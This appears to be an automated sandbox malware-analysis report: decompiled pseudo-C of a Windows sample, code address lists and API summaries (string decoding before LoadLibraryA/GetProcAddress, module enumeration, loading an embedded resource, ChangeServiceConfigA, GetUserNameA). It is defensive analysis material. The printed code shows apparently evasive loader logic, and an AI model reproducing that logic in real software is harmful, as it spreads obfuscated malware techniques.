                                                                        						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                        						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                        						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                        						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                        						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                        						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                        						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                        						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                        						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                        						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                        						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                        						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                        						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                        						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                        						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                        						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                        						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                        						 *((char*)(_t561 + 0x54)) = 0;
                                                                        						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                        						_t562 = _t561 + 0x24;
                                                                        						_t365 = LoadLibraryA(_t364); // executed
                                                                        						_t538 = _t365;
                                                                        						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                        						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                        						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                        						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                        						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                        						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                        						_t451 = _t562 + 0x134;
                                                                        						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                        						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                        						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                        						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                        						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                        						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                        						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                        						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                        						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                        						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                        						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                        						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                        						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                        						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                        						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                        						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                        						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                        						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                        						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                        						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                        						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                        						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                        						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                        						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                        						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                        						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                        						 *((char*)(_t562 + 0x38)) = 0;
                                                                        						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                        						_t563 = _t562 + 8;
                                                                        						_t367 = GetProcAddress(_t365, _t366);
                                                                        						__eflags = _t367;
                                                                        						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                        						__eflags = _t452;
                                                                        						 *(_t563 + 0x47) = _t452 == 0;
                                                                        						 *0x423480 = _t367;
                                                                        						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                        						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                        						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                        						 *(_t563 + 0x58) = 0;
                                                                        						 *(_t563 + 0x54) = 0;
                                                                        						__eflags = _t452;
                                                                        						if(_t452 != 0) {
                                                                        							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                        							__eflags = _t368;
                                                                        							if(_t368 >= 0) {
                                                                        								__eflags =  *(_t563 + 0x47);
                                                                        								if( *(_t563 + 0x47) == 0) {
                                                                        									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                        									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                        									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                        									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                        									__eflags = _t378;
                                                                        									if(_t378 >= 0) {
                                                                        										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                        										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                        										__eflags = _t383;
                                                                        										if(_t383 >= 0) {
                                                                        											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                        											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                        											__eflags = _t385;
                                                                        											if(_t385 >= 0) {
                                                                        												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                        												E00401870(_t563 + 0x44, _t552, "_._");
                                                                        												_t539 = __imp__#8;
                                                                        												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                        												 *_t539(_t563 + 0x94);
                                                                        												E00401870(_t563 + 0x3c, _t552, "___");
                                                                        												 *_t539(_t563 + 0xa4);
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                        												_t542 =  *(_t563 + 0x58);
                                                                        												__eflags = _t542;
                                                                        												if(_t542 == 0) {
                                                                        													E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                        												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                        												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                        												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                        												_t543 = _t396;
                                                                        												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                        												__imp__#23(_t543, _t563 + 0x48);
                                                                        												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                        												_t564 = _t563 + 0xc;
                                                                        												__imp__#24(_t543);
                                                                        												_t399 =  *(_t564 + 0x54);
                                                                        												__eflags = _t399;
                                                                        												if(_t399 == 0) {
                                                                        													_t399 = E0040AD90(0x80004003);
                                                                        												}
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                        												__eflags = _t543;
                                                                        												if(_t543 != 0) {
                                                                        													__imp__#16(_t543); // executed
                                                                        												}
                                                                        												_t402 =  *(_t564 + 0x34);
                                                                        												__eflags = _t402;
                                                                        												if(_t402 == 0) {
                                                                        													_t402 = E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t469 =  *(_t564 + 0x40);
                                                                        												_t555 = _t402;
                                                                        												__eflags = _t469;
                                                                        												if(_t469 == 0) {
                                                                        													_t531 = 0;
                                                                        													__eflags = 0;
                                                                        												} else {
                                                                        													_t531 =  *_t469;
                                                                        												}
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                        												__imp__#411(0xc, 0, 0);
                                                                        												_t471 =  *(_t564 + 0x3c);
                                                                        												__eflags = _t471;
                                                                        												if(_t471 == 0) {
                                                                        													E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t405 =  *(_t564 + 0x38);
                                                                        												__eflags = _t405;
                                                                        												if(_t405 == 0) {
                                                                        													_t514 = 0;
                                                                        													__eflags = 0;
                                                                        												} else {
                                                                        													_t514 =  *_t405;
                                                                        												}
                                                                        												_t563 = _t564 - 0x10;
                                                                        												_t407 = _t563;
                                                                        												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                        												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                        												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                        												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                        												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                        												_t538 = __imp__#9; // 0x77b5cf00
                                                                        												_t538->i(_t563 + 0xa4);
                                                                        												E004019A0(_t563 + 0x38);
                                                                        												_t538->i(_t563 + 0x94);
                                                                        												_t413 =  *(_t563 + 0x3c);
                                                                        												__eflags = _t413;
                                                                        												if(_t413 != 0) {
                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                        												}
                                                                        												E004019A0(_t563 + 0x40);
                                                                        												_t415 =  *(_t563 + 0x34);
                                                                        												__eflags = _t415;
                                                                        												if(_t415 != 0) {
                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                        									__eflags = _t379 - _t563 + 0x178;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t379);
                                                                        										E0040B6B5(0, _t528, _t538, __eflags);
                                                                        										_t563 = _t563 + 4;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t369 =  *(_t563 + 0x54);
                                                                        							__eflags = _t369;
                                                                        							if(_t369 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                        							}
                                                                        							_t370 =  *(_t563 + 0x58);
                                                                        							__eflags = _t370;
                                                                        							if(_t370 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                        							}
                                                                        						}
                                                                        						goto L80;
                                                                        					} else {
                                                                        						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                        						_t565 = _t557 + 8;
                                                                        						_t547 = _t428;
                                                                        						_t520 = _t565 + 0x298;
                                                                        						while(1) {
                                                                        							_t429 =  *_t520;
                                                                        							if(_t429 !=  *_t547) {
                                                                        								break;
                                                                        							}
                                                                        							if(_t429 == 0) {
                                                                        								L7:
                                                                        								_t429 = 0;
                                                                        							} else {
                                                                        								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                        								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                        									break;
                                                                        								} else {
                                                                        									_t520 = _t520 + 2;
                                                                        									_t547 = _t547 + 2;
                                                                        									if(_t493 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L7;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L9:
                                                                        							if(_t429 != 0) {
                                                                        								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                        								_t557 = _t565 + 8;
                                                                        								_t548 = _t431;
                                                                        								_t488 = _t557 + 0x298;
                                                                        								while(1) {
                                                                        									_t432 =  *_t488;
                                                                        									__eflags = _t432 -  *_t548;
                                                                        									if(_t432 !=  *_t548) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags = _t432;
                                                                        									if(_t432 == 0) {
                                                                        										L16:
                                                                        										_t432 = 0;
                                                                        									} else {
                                                                        										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                        										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                        										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                        											break;
                                                                        										} else {
                                                                        											_t488 = _t488 + 2;
                                                                        											_t548 = _t548 + 2;
                                                                        											__eflags = _t432;
                                                                        											if(_t432 != 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L16;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									L18:
                                                                        									__eflags = _t432;
                                                                        									if(_t432 == 0) {
                                                                        										goto L10;
                                                                        									} else {
                                                                        										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                        										__eflags = _t435;
                                                                        										if(_t435 != 0) {
                                                                        											do {
                                                                        												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                        												_t566 = _t557 + 8;
                                                                        												_t549 = _t437;
                                                                        												_t490 = _t566 + 0x298;
                                                                        												while(1) {
                                                                        													_t438 =  *_t490;
                                                                        													__eflags = _t438 -  *_t549;
                                                                        													if(_t438 !=  *_t549) {
                                                                        														break;
                                                                        													}
                                                                        													__eflags = _t438;
                                                                        													if(_t438 == 0) {
                                                                        														L26:
                                                                        														_t438 = 0;
                                                                        													} else {
                                                                        														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                        														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                        														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                        															break;
                                                                        														} else {
                                                                        															_t490 = _t490 + 2;
                                                                        															_t549 = _t549 + 2;
                                                                        															__eflags = _t438;
                                                                        															if(_t438 != 0) {
                                                                        																continue;
                                                                        															} else {
                                                                        																goto L26;
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        													L28:
                                                                        													__eflags = _t438;
                                                                        													if(_t438 == 0) {
                                                                        														goto L10;
                                                                        													} else {
                                                                        														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                        														_t557 = _t566 + 8;
                                                                        														_t550 = _t439;
                                                                        														_t492 = _t557 + 0x298;
                                                                        														while(1) {
                                                                        															_t440 =  *_t492;
                                                                        															__eflags = _t440 -  *_t550;
                                                                        															if(_t440 !=  *_t550) {
                                                                        																break;
                                                                        															}
                                                                        															__eflags = _t440;
                                                                        															if(_t440 == 0) {
                                                                        																L34:
                                                                        																_t440 = 0;
                                                                        															} else {
                                                                        																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                        																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                        																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                        																	break;
                                                                        																} else {
                                                                        																	_t492 = _t492 + 2;
                                                                        																	_t550 = _t550 + 2;
                                                                        																	__eflags = _t440;
                                                                        																	if(_t440 != 0) {
                                                                        																		continue;
                                                                        																	} else {
                                                                        																		goto L34;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        															L36:
                                                                        															__eflags = _t440;
                                                                        															if(_t440 == 0) {
                                                                        																goto L10;
                                                                        															} else {
                                                                        																goto L37;
                                                                        															}
                                                                        															goto L81;
                                                                        														}
                                                                        														asm("sbb eax, eax");
                                                                        														asm("sbb eax, 0xffffffff");
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L81;
                                                                        												}
                                                                        												asm("sbb eax, eax");
                                                                        												asm("sbb eax, 0xffffffff");
                                                                        												goto L28;
                                                                        												L37:
                                                                        												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                        												__eflags = _t442;
                                                                        											} while (_t442 != 0);
                                                                        										}
                                                                        										goto L38;
                                                                        									}
                                                                        									goto L81;
                                                                        								}
                                                                        								asm("sbb eax, eax");
                                                                        								asm("sbb eax, 0xffffffff");
                                                                        								goto L18;
                                                                        							} else {
                                                                        								L10:
                                                                        								CloseHandle(_t525);
                                                                        								return 0;
                                                                        							}
                                                                        							goto L81;
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						asm("sbb eax, 0xffffffff");
                                                                        						goto L9;
                                                                        					}
                                                                        				}
                                                                        				L81:
                                                                        			}
                                                                        0x00401e9a
                                                                        0x00401ea4
                                                                        0x00401eaf
                                                                        0x00401eba
                                                                        0x00401ebf
                                                                        0x00401ec4
                                                                        0x00401ec6
                                                                        0x00401ecb
                                                                        0x00401ece
                                                                        0x00401ed2
                                                                        0x00401ed4
                                                                        0x00401eef
                                                                        0x00401ed6
                                                                        0x00401edd
                                                                        0x00401ee2
                                                                        0x00401ee6
                                                                        0x00401ee9
                                                                        0x00401ee9
                                                                        0x00401ef7
                                                                        0x00401efc
                                                                        0x00401f02
                                                                        0x00401f08
                                                                        0x00401f0c
                                                                        0x00401f15
                                                                        0x00401f18
                                                                        0x00401f1a
                                                                        0x00401f1c
                                                                        0x00401f22
                                                                        0x00401f22
                                                                        0x00401f24
                                                                        0x00401f28
                                                                        0x00401f2f
                                                                        0x00401f33
                                                                        0x00401f33
                                                                        0x00401f40
                                                                        0x00401f45
                                                                        0x00401f4a
                                                                        0x00401f4b
                                                                        0x00401f50
                                                                        0x00401f58
                                                                        0x00401f58
                                                                        0x00401f58
                                                                        0x00401f58
                                                                        0x00401f33
                                                                        0x00401f63
                                                                        0x00401f63
                                                                        0x00401f69
                                                                        0x00401f72
                                                                        0x00401f72
                                                                        0x00401f72
                                                                        0x00401f73
                                                                        0x00401f75
                                                                        0x00401f7b
                                                                        0x00401f80
                                                                        0x00401f81
                                                                        0x00401f86
                                                                        0x00401f86
                                                                        0x00401f8c
                                                                        0x00401f8d
                                                                        0x00401f8d
                                                                        0x00401f9d
                                                                        0x00401fa2
                                                                        0x00401fa6
                                                                        0x00401fac
                                                                        0x00401faf
                                                                        0x00401fb6
                                                                        0x00401fbf
                                                                        0x00401fc4
                                                                        0x00401fc8
                                                                        0x00401fce
                                                                        0x00401fd3
                                                                        0x00401fe0
                                                                        0x00401fec
                                                                        0x00401ffe
                                                                        0x00402001
                                                                        0x00402006
                                                                        0x0040200b
                                                                        0x00402010
                                                                        0x00402015
                                                                        0x0040201a
                                                                        0x0040201f
                                                                        0x00402024
                                                                        0x00402029
                                                                        0x0040202e
                                                                        0x00402033
                                                                        0x00402038
                                                                        0x0040203d
                                                                        0x00402042
                                                                        0x00402047
                                                                        0x0040204c
                                                                        0x00402051
                                                                        0x00402056
                                                                        0x0040205b
                                                                        0x00402060
                                                                        0x00402065
                                                                        0x0040206a
                                                                        0x0040206f
                                                                        0x00402074
                                                                        0x00402079
                                                                        0x0040207e
                                                                        0x00402083
                                                                        0x00402088
                                                                        0x0040208d
                                                                        0x00402092
                                                                        0x00402097
                                                                        0x0040209c
                                                                        0x004020a1
                                                                        0x004020a5
                                                                        0x004020aa
                                                                        0x004020ae
                                                                        0x004020b4
                                                                        0x004020b6
                                                                        0x004020bb
                                                                        0x004020c0
                                                                        0x004020c5
                                                                        0x004020ca
                                                                        0x004020cf
                                                                        0x004020d4
                                                                        0x004020e1
                                                                        0x004020e6
                                                                        0x004020eb
                                                                        0x004020f0
                                                                        0x004020f5
                                                                        0x004020fa
                                                                        0x004020ff
                                                                        0x00402104
                                                                        0x00402109
                                                                        0x0040210e
                                                                        0x00402113
                                                                        0x00402118
                                                                        0x0040211d
                                                                        0x00402122
                                                                        0x00402127
                                                                        0x0040212c
                                                                        0x00402131
                                                                        0x00402136
                                                                        0x0040213b
                                                                        0x00402140
                                                                        0x00402145
                                                                        0x0040214a
                                                                        0x0040214f
                                                                        0x00402154
                                                                        0x00402159
                                                                        0x0040215e
                                                                        0x00402163
                                                                        0x00402167
                                                                        0x0040216c
                                                                        0x00402171
                                                                        0x00402177
                                                                        0x00402179
                                                                        0x0040217c
                                                                        0x0040217e
                                                                        0x00402183
                                                                        0x00402188
                                                                        0x0040218f
                                                                        0x00402196
                                                                        0x0040219a
                                                                        0x0040219e
                                                                        0x004021a2
                                                                        0x004021a4
                                                                        0x004021bc
                                                                        0x004021be
                                                                        0x004021c0
                                                                        0x004021c6
                                                                        0x004021ca
                                                                        0x004021e5
                                                                        0x004021ec
                                                                        0x004021f1
                                                                        0x00402213
                                                                        0x00402215
                                                                        0x00402217
                                                                        0x0040221d
                                                                        0x00402239
                                                                        0x0040223b
                                                                        0x0040223d
                                                                        0x00402243
                                                                        0x0040224d
                                                                        0x0040224f
                                                                        0x00402251
                                                                        0x00402260
                                                                        0x00402264
                                                                        0x00402269
                                                                        0x00402277
                                                                        0x0040227b
                                                                        0x00402286
                                                                        0x00402293
                                                                        0x004022af
                                                                        0x004022b1
                                                                        0x004022b5
                                                                        0x004022b7
                                                                        0x004022be
                                                                        0x004022be
                                                                        0x004022d7
                                                                        0x004022e8
                                                                        0x004022ef
                                                                        0x004022f6
                                                                        0x00402300
                                                                        0x00402304
                                                                        0x00402308
                                                                        0x00402315
                                                                        0x0040231a
                                                                        0x0040231e
                                                                        0x00402324
                                                                        0x00402328
                                                                        0x0040232a
                                                                        0x00402331
                                                                        0x00402331
                                                                        0x0040234e
                                                                        0x00402350
                                                                        0x00402352
                                                                        0x00402355
                                                                        0x00402355
                                                                        0x0040235b
                                                                        0x0040235f
                                                                        0x00402361
                                                                        0x00402368
                                                                        0x00402368
                                                                        0x0040236d
                                                                        0x00402371
                                                                        0x00402373
                                                                        0x00402375
                                                                        0x0040237b
                                                                        0x0040237b
                                                                        0x00402377
                                                                        0x00402377
                                                                        0x00402377
                                                                        0x00402390
                                                                        0x00402396
                                                                        0x0040239c
                                                                        0x004023a0
                                                                        0x004023a2
                                                                        0x004023a9
                                                                        0x004023a9
                                                                        0x004023ae
                                                                        0x004023b2
                                                                        0x004023b4
                                                                        0x004023ba
                                                                        0x004023ba
                                                                        0x004023b6
                                                                        0x004023b6
                                                                        0x004023b6
                                                                        0x004023ce
                                                                        0x004023d1
                                                                        0x004023d3
                                                                        0x004023dd
                                                                        0x004023ec
                                                                        0x004023ef
                                                                        0x004023fe
                                                                        0x00402401
                                                                        0x00402403
                                                                        0x00402411
                                                                        0x00402417
                                                                        0x00402424
                                                                        0x00402426
                                                                        0x0040242a
                                                                        0x0040242c
                                                                        0x00402434
                                                                        0x00402434
                                                                        0x0040243a
                                                                        0x0040243f
                                                                        0x00402443
                                                                        0x00402445
                                                                        0x0040244d
                                                                        0x0040244d
                                                                        0x00402445
                                                                        0x00402251
                                                                        0x0040223d
                                                                        0x0040244f
                                                                        0x0040245d
                                                                        0x0040245f
                                                                        0x00402461
                                                                        0x00402462
                                                                        0x00402467
                                                                        0x00402467
                                                                        0x0040245f
                                                                        0x004021ca
                                                                        0x0040246a
                                                                        0x0040246e
                                                                        0x00402470
                                                                        0x00402478
                                                                        0x00402478
                                                                        0x0040247a
                                                                        0x0040247e
                                                                        0x00402480
                                                                        0x00402488
                                                                        0x00402488
                                                                        0x00402480
                                                                        0x00000000
                                                                        0x00401c55
                                                                        0x00401c62
                                                                        0x00401c67
                                                                        0x00401c6a
                                                                        0x00401c6c
                                                                        0x00401c73
                                                                        0x00401c73
                                                                        0x00401c77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c7b
                                                                        0x00401c8f
                                                                        0x00401c8f
                                                                        0x00401c7d
                                                                        0x00401c7d
                                                                        0x00401c83
                                                                        0x00000000
                                                                        0x00401c85
                                                                        0x00401c85
                                                                        0x00401c88
                                                                        0x00401c8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c8d
                                                                        0x00401c83
                                                                        0x00401c98
                                                                        0x00401c9a
                                                                        0x00401cbd
                                                                        0x00401cc2
                                                                        0x00401cc5
                                                                        0x00401cc7
                                                                        0x00401cd0
                                                                        0x00401cd0
                                                                        0x00401cd2
                                                                        0x00401cd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cd6
                                                                        0x00401cd8
                                                                        0x00401cec
                                                                        0x00401cec
                                                                        0x00401cda
                                                                        0x00401cda
                                                                        0x00401cdd
                                                                        0x00401ce0
                                                                        0x00000000

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                        • Module32Next.KERNEL32 ref: 00401D02
                                                                        • Module32Next.KERNEL32 ref: 00401DB6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPBs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                        • API String ID: 1430744539-533690119
                                                                        • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                        • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0202A4A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeConfigService
                                                                        • String ID:
                                                                        • API String ID: 3849694230-0
                                                                        • Opcode ID: 30bdcf7547700416ebf373270753457c99ef48b2d27a16fd7289d010c96a08dc
                                                                        • Instruction ID: 958d5a984f35d47acdb98566e8ee60eebf110c37660ac838638278faf40cefa1
                                                                        • Opcode Fuzzy Hash: 30bdcf7547700416ebf373270753457c99ef48b2d27a16fd7289d010c96a08dc
                                                                        • Instruction Fuzzy Hash: E4C16C71E007298FDB11CFA8C9857AEBBF2BF44314F10812AEC55E6280DB749889DF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetUserNameA.ADVAPI32(00000000), ref: 020297F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.368396198.0000000002020000.00000040.00000800.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2020000_arJf.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 2f995c6028a54c1c9d7ba3f288fb3a70bd4ea595d3d33be6e339a2ee5ad148bf
                                                                        • Instruction ID: 801e384ab9c4c97a809eb2deb334ae1c17da86a29fc578fc48bca35390b5d5bc
                                                                        • Opcode Fuzzy Hash: 2f995c6028a54c1c9d7ba3f288fb3a70bd4ea595d3d33be6e339a2ee5ad148bf
                                                                        • Instruction Fuzzy Hash: 9C512274E003198FDB14CFA9C994BDEBBF1AF48304F24802AE816AB395C7749849CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                        				signed int _v4;
                                                                        				signed int _v16;
                                                                        				signed int _v40;
                                                                        				void* _t14;
                                                                        				signed int _t15;
                                                                        				intOrPtr* _t21;
                                                                        				signed int _t24;
                                                                        				void* _t28;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				signed int _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t51;
                                                                        
                                                                        				_t40 = __edi;
                                                                        				_t28 = __ebx;
                                                                        				_t45 = _t51;
                                                                        				while(1) {
                                                                        					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
